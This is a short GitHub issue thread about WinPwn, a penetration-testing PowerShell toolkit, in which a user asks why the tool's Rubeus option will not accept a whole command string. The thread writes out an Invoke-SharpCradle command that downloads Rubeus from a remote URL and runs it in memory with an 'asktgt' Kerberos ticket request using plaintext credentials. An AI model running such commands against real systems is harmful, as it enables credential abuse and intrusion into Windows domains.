Closed IAMinZoho closed 2 years ago
Please help. Thanks in advance.
The function only accepts two arguments, not more. So what you want to do with it is not possible.
But I can still update the main menu with a Rubeus custom command option in the next days.
Thank you so much Fabian! ;-)
On the Rubeus piece, I did find a way to use the Option 14 to load rubeus.exe into PowerShell using the Invoke-SharpCradle module in WinPwn. (Thanks to you again!!)
If I use
Invoke-SharpCradle -Url https://raw.githubxxxx -Argument1 asktgt /user:Bob /password:user@123
---> works perfectly well.but, from WinPwn when I use the same functionality, why do I need to pass 3 arguments separately? When I prompted for Argument1 I typed:
asktgt /user:Bob /password:user@123
and it failed to process! Is it not possible to pass the entire command as string and pass it to Rubeus as Argument1 in WinPwn just like Invoke-SharpCradle!Please comment!